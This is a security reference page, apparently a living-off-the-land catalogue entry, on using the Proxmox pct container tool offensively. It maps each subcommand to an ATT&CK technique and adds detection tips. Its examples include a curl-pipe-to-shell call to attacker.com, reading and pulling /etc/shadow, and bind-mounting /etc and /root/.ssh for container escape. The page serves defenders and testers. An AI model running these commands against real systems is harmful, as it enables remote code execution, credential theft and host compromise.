.. /pct

Star

pct (Proxmox Container Toolkit) is the command-line tool for managing LXC containers in Proxmox VE. It provides container lifecycle management including creation, configuration, and execution. Adversaries can leverage pct to spawn privileged containers for host escape, execute commands in existing containers, and manipulate container configurations for persistence.

Paths

• /usr/sbin/pct

Resources

• https://pve.proxmox.com/pve-docs/pct.1.html
• https://pve.proxmox.com/wiki/Linux_Container
• https://pve.proxmox.com/wiki/Unprivileged_LXC_containers

Detection

• Monitor /var/log/pve/tasks/* for pct exec commands
• Watch for privileged container creation or feature changes
• Alert on bind mounts to sensitive host directories

Acknowledgements

• ZephrFish

Discovery

1. Lists all LXC containers on the current node with their CTID, status, lock, and name.

   pct list

   Use Case Enumerate all containers to identify targets for lateral movement or host escape vectors.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pct list

   • pct list | grep running

   ATT&CK Technique T1082

2. Display full configuration of a container including mount points, networking, and privileges.

   pct config {ctid}

   Use Case Identify privileged containers or containers with host filesystem access that can be exploited.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pct config 100

   • pct config 100 | grep -E "mount|features|unprivileged"

   ATT&CK Technique T1082

Execution

1. Execute arbitrary commands inside a running container.

   pct exec {ctid} -- command

   Use Case Lateral movement by executing commands in containers without authentication.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pct exec 100 -- cat /etc/shadow

   • pct exec 100 -- /bin/bash -c "whoami && id"

   • pct exec 100 -- /bin/sh -c "curl http://attacker.com/shell.sh | sh"

   ATT&CK Technique T1059

   Tags

   Lateral MovementContainer Escape

2. Open an interactive shell session inside a container.

   pct enter {ctid}

   Use Case Gain interactive access to a container for manual reconnaissance or exploitation.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1059

3. Copy a file from the host into a container.

   pct push {ctid} localfile remotefile

   Use Case Deploy malware, backdoors, or tools into containers for lateral movement.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pct push 100 /tmp/payload.sh /tmp/payload.sh

   ATT&CK Technique T1105

Collection

1. Copy a file from a container to the host.

   pct pull {ctid} remotefile localfile

   Use Case Exfiltrate sensitive data from containers including credentials and configuration files.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pct pull 100 /etc/shadow /tmp/shadow.txt

   ATT&CK Technique T1005

2. Create a snapshot of a container.

   pct snapshot {ctid} {snapname}

   Use Case Snapshot containers before manipulation for potential rollback or offline analysis.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1074.001

Privilege Escalation

1. Add a bind mount from host filesystem to container.

   pct set {ctid} -mp0 /host/path,mp=/container/path

   Use Case Mount sensitive host directories into containers for privilege escalation or data access.

   Privileges Required Administrator

   Operating System Proxmox VE

   Procedural Examples

   • pct set 100 -mp0 /etc,mp=/mnt/host-etc

   • pct set 100 -mp0 /root/.ssh,mp=/mnt/ssh-keys

   ATT&CK Technique T1611

   Tags

   Container EscapePrivilege Escalation

Configuration

1. Enable container nesting and keyctl features.

   pct set {ctid} --features nesting=1,keyctl=1

   Use Case Enable features required for running Docker inside containers or accessing kernel keyrings.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1548

Impact

1. Stop a running container.

   pct stop {ctid}

   Use Case Impact by shutting down containers hosting critical services.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1529

2. Permanently destroy a container and its data.

   pct destroy {ctid}

   Use Case Destructive impact by permanently deleting containers.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1485

Persistence

1. Create a new container from a template.

   pct create {ctid} template.tar.gz --hostname backdoor --rootfs local:8

   Use Case Spawn a malicious container for persistence or as a pivot point.

   Privileges Required Administrator

   Operating System Proxmox VE
   ATT&CK Technique T1610